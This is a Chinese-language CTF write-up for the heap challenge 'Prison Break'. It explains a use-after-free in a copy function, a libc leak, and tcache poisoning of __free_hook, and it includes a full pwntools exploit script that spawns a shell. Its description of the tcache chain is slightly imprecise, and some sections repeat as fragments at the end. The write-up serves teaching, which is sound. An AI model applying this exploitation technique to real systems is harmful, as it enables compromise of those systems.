University CTF 2024 pwn - Prison Break 详细教学文档<\/h1>

题目概述<\/h2>
这是一个考察堆利用技术的CTF题目，主要涉及对tcachebin链表的理解和利用，以及如何结合题目功能函数实现内存泄露和劫持控制流。<\/p>

逆向分析<\/h2>

数据结构<\/h3>

题目使用了一个结构体：<\/p>

struct<\/span> stru {
<\/span><\/span>    int<\/span> isUsed;     \/\/ 标识是否使用
<\/span><\/span><\/span><\/span>    char<\/span> *<\/span>ptr;      \/\/ 可控大小的内存指针
<\/span><\/span><\/span><\/span>    size_t size;    \/\/ 分配的大小
<\/span><\/span><\/span><\/span>};
<\/span><\/span><\/code><\/pre>功能函数分析<\/h3>


create函数<\/strong>:<\/p>

申请一个stru结构体<\/li>
根据用户指定大小分配内存<\/li>
设置isUsed标志为1<\/li>
<\/ul>
<\/li>

delete函数<\/strong>:<\/p>

不释放stru结构体本身<\/li>
只释放结构体中的ptr指针指向的内存<\/li>
不清理isUsed标志<\/li>
<\/ul>
<\/li>

view函数<\/strong>:<\/p>

只打印isUsed为1的结构体中ptr指向的数据<\/li>
<\/ul>
<\/li>

copy_paste函数<\/strong>:<\/p>

复制一个结构体指针的内容到另一个结构体指针<\/li>
只需要其中一个结构体可用(isUsed=1)即可执行复制<\/li>
这是漏洞的关键点<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞分析<\/h2>
copy_paste函数的实现存在问题：<\/p>

只需要源或目标结构体中有一个是isUsed=1即可执行复制<\/li>
这意味着可以：

将已释放的chunk的内容复制到正常chunk中（泄露内存）<\/li>
通过复制操作控制tcache链表<\/li>
<\/ul>
<\/li>
<\/ul>
利用思路<\/h2>
阶段一：泄露libc地址<\/h3>

申请多个0x80大小的chunk（例如9个：chunk0-chunk8）<\/li>
释放其中的8个（chunk1-chunk8）

前7个会进入tcache bin<\/li>
第8个（chunk8）会进入unsorted bin（因为tcache bin默认最多缓存7个）<\/li>
<\/ul>
<\/li>
此时内存布局：

tcache bin: chunk7 -> chunk6 -> ... -> chunk1<\/li>
unsorted bin: chunk8<\/li>
<\/ul>
<\/li>
使用copy_paste将chunk8（已释放）的内容复制到chunk0（未释放）

由于chunk8在unsorted bin中，其fd\/bk指针指向main_arena<\/li>
这样可以通过view查看chunk0的内容泄露libc地址<\/li>
<\/ul>
<\/li>
<\/ol>
阶段二：劫持__free_hook<\/h3>

申请一个0x70大小的chunk（非0x80，避免干扰）<\/li>
在这个chunk中写入__free_hook的地址<\/li>
将这个地址复制到chunk7（tcache链表的末尾）中

这会修改tcache链表，使得下一次分配会返回__free_hook地址<\/li>
<\/ul>
<\/li>
现在tcache链表变为：__free_hook -> chunk6 -> ... -> chunk1<\/li>
<\/ol>
阶段三：获取shell<\/h3>

申请一个chunk，由于tcache链表被篡改，将获得__free_hook地址处的内存<\/li>
在这个chunk中写入system函数的地址<\/li>
释放一个包含"\/bin\/sh"字符串的chunk，触发__free_hook执行system("\/bin\/sh")<\/li>
<\/ol>
预期解EXP<\/h2>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>context(os=<\/span>'linux'<\/span>, arch=<\/span>'amd64'<\/span>)
<\/span><\/span># context.log_level = 'debug'<\/span>
<\/span><\/span>
<\/span><\/span>libc =<\/span> ELF('.\/libc.so.6'<\/span>)
<\/span><\/span>elf =<\/span> ELF('.\/pwn'<\/span>)
<\/span><\/span>
<\/span><\/span>p =<\/span> process('.\/pwn'<\/span>)
<\/span><\/span>
<\/span><\/span>def<\/span> create<\/span>(index, size, content):
<\/span><\/span>    p.<\/span>sendlineafter(b<\/span>'> '<\/span>, b<\/span>'1'<\/span>)
<\/span><\/span>    p.<\/span>sendlineafter(b<\/span>'index: '<\/span>, str(index).<\/span>encode())
<\/span><\/span>    p.<\/span>sendlineafter(b<\/span>'size: '<\/span>, str(size).<\/span>encode())
<\/span><\/span>    p.<\/span>sendafter(b<\/span>'content: '<\/span>, content)
<\/span><\/span>
<\/span><\/span>def<\/span> delete<\/span>(index):
<\/span><\/span>    p.<\/span>sendlineafter(b<\/span>'> '<\/span>, b<\/span>'2'<\/span>)
<\/span><\/span>    p.<\/span>sendlineafter(b<\/span>'index: '<\/span>, str(index).<\/span>encode())
<\/span><\/span>
<\/span><\/span>def<\/span> view<\/span>(index):
<\/span><\/span>    p.<\/span>sendlineafter(b<\/span>'> '<\/span>, b<\/span>'3'<\/span>)
<\/span><\/span>    p.<\/span>sendlineafter(b<\/span>'index: '<\/span>, str(index).<\/span>encode())
<\/span><\/span>    return<\/span> p.<\/span>recvline()
<\/span><\/span>
<\/span><\/span>def<\/span> copy_paste<\/span>(src, dst):
<\/span><\/span>    p.<\/span>sendlineafter(b<\/span>'> '<\/span>, b<\/span>'4'<\/span>)
<\/span><\/span>    p.<\/span>sendlineafter(b<\/span>'src: '<\/span>, str(src).<\/span>encode())
<\/span><\/span>    p.<\/span>sendlineafter(b<\/span>'dst: '<\/span>, str(dst).<\/span>encode())
<\/span><\/span>
<\/span><\/span># 泄露libc地址<\/span>
<\/span><\/span>for<\/span> i in<\/span> range(9<\/span>):
<\/span><\/span>    create(i, 0x80<\/span>, b<\/span>'a'<\/span>*<\/span>0x80<\/span>)
<\/span><\/span>
<\/span><\/span>for<\/span> i in<\/span> range(1<\/span>, 9<\/span>):
<\/span><\/span>    delete(i)
<\/span><\/span>
<\/span><\/span># chunk8进入unsorted bin，复制到chunk0<\/span>
<\/span><\/span>copy_paste(8<\/span>, 0<\/span>)
<\/span><\/span>leak =<\/span> u64(view(0<\/span>)[:8<\/span>])
<\/span><\/span>libc_base =<\/span> leak -<\/span> 0x3ebca0<\/span>
<\/span><\/span>__free_hook =<\/span> libc_base +<\/span> libc.<\/span>sym['__free_hook'<\/span>]
<\/span><\/span>system =<\/span> libc_base +<\/span> libc.<\/span>sym['system'<\/span>]
<\/span><\/span>log.<\/span>success(f<\/span>'libc base: <\/span>{<\/span>hex(libc_base)}<\/span>'<\/span>)
<\/span><\/span>
<\/span><\/span># 劫持tcache<\/span>
<\/span><\/span>create(9<\/span>, 0x70<\/span>, p64(__free_hook))
<\/span><\/span>copy_paste(9<\/span>, 7<\/span>)
<\/span><\/span>
<\/span><\/span># 获取__free_hook并写入system<\/span>
<\/span><\/span>create(10<\/span>, 0x80<\/span>, b<\/span>'\/bin\/sh<\/span>\x00<\/span>'<\/span>)
<\/span><\/span>create(11<\/span>, 0x80<\/span>, p64(system))
<\/span><\/span>
<\/span><\/span># 触发system("\/bin\/sh")<\/span>
<\/span><\/span>delete(10<\/span>)
<\/span><\/span>
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>非预期解<\/h2>
作者最初尝试的另一种利用方式：<\/p>

通过篡改某个结构的ptr指针，使其指向__free_hook<\/li>
然后通过copy操作向__free_hook写入system地址<\/li>
虽然也能达到目的，但相比预期解更为复杂<\/li>
<\/ol>
关键点总结<\/h2>

copy_paste函数的漏洞<\/strong>：只需要一个结构体可用即可复制，允许操作已释放的内存<\/li>
tcache bin的限制<\/strong>：默认只缓存7个相同大小的chunk，第8个会进入unsorted bin<\/li>
泄露libc<\/strong>：通过unsorted bin的fd\/bk指针泄露main_arena地址<\/li>
链表劫持<\/strong>：通过复制操作修改tcache链表，控制分配地址<\/li>
__free_hook利用<\/strong>：经典的hook劫持技术获取shell<\/li>
<\/ol>
学习要点<\/h2>

理解tcache bin和unsorted bin的行为差异<\/li>
掌握如何通过UAF泄露libc地址<\/li>
学习如何通过修改tcache链表控制分配<\/li>
理解__free_hook的利用方式<\/li>
体会预期解和非预期解的不同思路<\/li>
<\/ol>

University CTF 2024 pwn - Prison Break 详细教学文档<\/h1>

题目概述<\/h2> 这是一个考察堆利用技术的CTF题目，主要涉及对tcachebin链表的理解和利用，以及如何结合题目功能函数实现内存泄露和劫持控制流。<\/p>

逆向分析<\/h2>

利用思路<\/h2>

学习要点<\/h2> 理解tcache bin和unsorted bin的行为差异<\/li> 掌握如何通过UAF泄露libc地址<\/li> 学习如何通过修改tcache链表控制分配<\/li> 理解__free_hook的利用方式<\/li> 体会预期解和非预期解的不同思路<\/li> <\/ol>

题目概述<\/h2>
这是一个考察堆利用技术的CTF题目，主要涉及对tcachebin链表的理解和利用，以及如何结合题目功能函数实现内存泄露和劫持控制流。<\/p>

学习要点<\/h2>

理解tcache bin和unsorted bin的行为差异<\/li>
掌握如何通过UAF泄露libc地址<\/li>
学习如何通过修改tcache链表控制分配<\/li>
理解__free_hook的利用方式<\/li>
体会预期解和非预期解的不同思路<\/li> <\/ol>